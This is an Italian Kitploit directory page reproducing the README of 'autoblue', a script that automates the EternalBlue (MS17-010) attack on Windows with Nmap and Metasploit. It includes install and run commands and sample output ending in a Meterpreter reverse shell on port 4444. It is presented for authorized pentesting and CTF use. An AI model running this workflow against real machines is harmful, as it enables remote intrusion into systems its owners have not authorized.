Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
autoblue — AutoBlue - Strumento di sfruttamento automatizzato per EternalBlue (CVE-2017-0144 / MS17-010) che utilizza Nmap e Metasploit per ethical hacking, penetration testing e sfide CTF. Solo per uso autorizzato ed educativo! | Kitploit
Strumenti/GitHubGitHub/atithkhawas/autoblue
Scanner di VulnerabilitàGenerazione di PayloadExploitPost-ExploitCTFPenetration TestingApprendimento e FormazioneRed Teaming
GitHubatithkhawas/autoblue

autoblue

AutoBlue - Strumento di sfruttamento automatizzato per EternalBlue (CVE-2017-0144 / MS17-010) che utilizza Nmap e Metasploit per ethical hacking, penetration testing e sfide CTF. Solo per uso autorizzato ed educativo!

Vedi Repository
4131 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

AUTOBLUE: Strumento Automatico per l'Exploit EternalBlue

AUTOBLUE è uno strumento di automazione progettato per sfruttare la vulnerabilità EternalBlue (CVE-2017-0144) su macchine Windows. Lo strumento integra la potenza di Nmap per la scansione delle vulnerabilità e di Metasploit's msfconsole per lo sfruttamento, consentendo agli utenti di identificare automaticamente i sistemi vulnerabili e lanciare l'exploit EternalBlue per ottenere accesso remoto al target.

Questo strumento è progettato principalmente per professionisti della sicurezza, penetration tester e hacker etici che operano in ambienti controllati e autorizzati, come sfide Capture The Flag (CTF), attività di penetration testing o configurazioni di laboratorio. AUTOBLUE consente agli utenti di sfruttare la vulnerabilità EternalBlue con un intervento manuale minimo, semplicemente inserendo l'indirizzo IP del target.

Caratteristiche

  • Scansione Automatica delle Vulnerabilità: Utilizza Nmap per scansionare la vulnerabilità EternalBlue (CVE-2017-0144) sulla macchina target.

  • Sfruttamento Senza Intoppi: Sfrutta Metasploit's msfconsole per lanciare automaticamente l'exploit EternalBlue.

  • Configurazione Semplice: Richiede solo un indirizzo IP target e un ambiente funzionante con Nmap e Metasploit installati.

  • Report di Output: Genera output che indica il successo o il fallimento del tentativo di exploit.

Indice dei Contenuti

  • Prerequisiti

  • Installazione

  • Utilizzo

  • Come Funziona

  • Considerazioni sulla Sicurezza

  • Contributi

  • Licenza

  • Riconoscimenti

  • Dichiarazione di non responsabilità

  • Prerequisiti:

    Prima di utilizzare AUTOBLUE, assicurati che i seguenti strumenti siano installati sulla tua macchina:

    Nmap: Uno strumento di scansione di rete per rilevare macchine vulnerabili.

    Metasploit Framework: Una piattaforma di penetration testing che include exploit per EternalBlue.

    Installare Nmap:

    • Su Linux (basato su Debian):

    Copia il codice

    root@kitploit:~
          sudo apt update
    

    e

    root@kitploit:~
          sudo apt install nmap
    

    Su Windows o macOS, scarica Nmap dal sito ufficiale.

    Installare Metasploit:

    Su Linux (basato su Debian):

    Copia il codice

    root@kitploit:~
          sudo apt update
    

    e

    root@kitploit:~
         sudo apt install metasploit-framework
         
    

    Su Windows o macOS, scarica Metasploit dal sito ufficiale.

    Installazione:

    Per installare AUTOBLUE, segui questi passaggi:

    • Clona il repository:

      root@kitploit:~
        git clone https://github.com/AtithKhawas/autoblue.git
      

      e

      root@kitploit:~
           cd autoblue
      

    Assicurati che Nmap e Metasploit siano correttamente installati come prerequisiti.

    • Rendi lo script eseguibile:

      root@kitploit:~
      chmod +x autoblue.sh
      

    Utilizzo:

    AUTOBLUE è progettato per automatizzare la scansione e lo sfruttamento della vulnerabilità EternalBlue. Ecco come usarlo:

    • Esegui lo Strumento

    Per utilizzare AUTOBLUE, esegui il seguente comando nel tuo terminale:

    Copia il codice

    root@kitploit:~
         ./autoblue.sh 
    

    Output:

    root@kitploit:~
         ┌──(root㉿kali)-[/home/Elliot] 
         └─# ./autoblue.sh 
         ============================================
         ********************************************
         AutoBlue    - EternalBlue Exploit Automation
         ********************************************
         ********************************************
         ------------------------Made by ATITH KHAWAS
         ============================================
         Enter Target IP Address:
    

    Ti chiederà l'indirizzo IP del target e il tuo.

    Esempio

    root@kitploit:~
          Enter Target IP Address: Target<IP Address>
          Enter Your IP Address: Your <IP Address>
    

    Una volta eseguito lo strumento, inizierà la scansione con Nmap:

    Output-1

    root@kitploit:~
     Target IP Address: ***.***.**.**
     [+] Scanning Target for MS17-010 Vulnerability...
     Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
     Nmap scan report for ***.***.**.**
     Host is up (0.19s latency).
    
     PORT    STATE SERVICE
     445/tcp open  microsoft-ds
    
     Host script results:
     | smb-vuln-ms17-010: 
     |   VULNERABLE:
     |   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
     |     State: VULNERABLE
     |     IDs:  CVE:CVE-2017-0143
     |     Risk factor: HIGH
     |       A critical remote code execution vulnerability exists in Microsoft SMBv1
     |        servers (ms17-010).
     |           
     |     Disclosure date: 2017-03-14
     |     References:
     |       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
     |       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
     |_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
    
     Nmap done: 1 IP address (1 host up) scanned in 2.40 seconds
     [+] Target is VULNERABLE to EternalBlue!
    

    Qui inizia il vero lavoro, riducendo significativamente il processo che richiede tempo. Se il target è vulnerabile, avvia automaticamente Msfconsole e imposta RHOSTS, PAYLOAD, LHOST e LPORT con la porta predefinita 4444.

    Output-2

    root@kitploit:~
          [+] Launching Metasploit...
          [*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
          RHOSTS => ***.***.**.**
          PAYLOAD => windows/x64/meterpreter/reverse_tcp
          LHOST => ***.***.**.**
          LPORT => 4444
          [*] Started reverse TCP handler on ***.***.**.**:4444 
    

    E ci fornisce la shell Meterpreter del target.

    Output-3

    root@kitploit:~
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
           [+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
    
           meterpreter > pwd
           C:\Windows\system32
    

    Come Funziona:

    • Scansione con Script Nmap: Lo strumento utilizza prima Nmap Script Scan (--script smb-vuln-ms17-010) per rilevare se la macchina target è vulnerabile all'exploit EternalBlue. Controlla se la porta 445 è aperta e tenta di identificare vulnerabilità SMB.

    • Exploit Metasploit: Se la macchina target risulta vulnerabile, AUTOBLUE procede a lanciare l'exploit EternalBlue utilizzando Metasploit's msfconsole. Lo script configurerà e invierà il payload necessario per sfruttare la vulnerabilità.

    • Reverse Shell: Se l'exploit ha successo, verrà aperta una reverse shell per fornire un'interfaccia a riga di comando sulla macchina vittima.

    • Feedback: Lo strumento fornisce feedback durante tutto il processo, incluso se il target è stato sfruttato con successo, e restituisce eventuali informazioni rilevanti (ad esempio, l'indirizzo IP della reverse shell).

    Considerazioni sulla Sicurezza:

    • Uso Legale: Questo strumento dovrebbe essere utilizzato solo in ambienti autorizzati. Assicurati di avere il permesso esplicito di testare la macchina target e che non sia illegale farlo nella tua giurisdizione.

    • Input dell'Utente: Assicurati che solo IP fidati vengano inseriti nello strumento per prevenire abusi. Eseguire questo strumento su sistemi non fidati potrebbe portare a incidenti di sicurezza.

    • Sicurezza del Payload: Il payload della reverse shell utilizzato in questo strumento è intrinsecamente rischioso. Non esporre la macchina attaccante o i suoi listener a reti non fidate.

    • Mantenere Aggiornate le Dipendenze: Assicurati di aggiornare regolarmente Nmap e Metasploit per mitigare vulnerabilità di sicurezza note in questi strumenti.

    Contributi:

    I contributi al progetto AUTOBLUE sono benvenuti. Se hai suggerimenti, miglioramenti o correzioni di bug, sentiti libero di fare il fork del repository e creare una pull request.

    Licenza:

    Questo strumento è open-source e distribuito sotto la licenza MIT. Sei libero di utilizzare, modificare e distribuire il software nei tuoi progetti. Tuttavia, devi includere questo avviso in tutte le copie o parti sostanziali del software.

    Riconoscimenti:

    • Nmap: Per aver fornito la funzionalità essenziale di scansione delle vulnerabilità.

    • Metasploit: Per aver fornito il framework per sfruttare la vulnerabilità EternalBlue.

    • Ricercatori di Sicurezza: Per aver scoperto e divulgato pubblicamente la vulnerabilità EternalBlue, che ha aiutato a proteggere i sistemi in tutto il mondo.

    Dichiarazione di non responsabilità:

    AUTOBLUE è uno strumento destinato esclusivamente a scopi educativi ed etici. Gli autori non sono responsabili per azioni illegali intraprese utilizzando questo strumento. È tua responsabilità assicurarti di avere il permesso esplicito di eseguire penetration test su qualsiasi sistema.

    Usa questo strumento a tuo rischio. Conduci sempre le attività di penetration testing in un ambiente sicuro e legale.

    Scarica lo strumento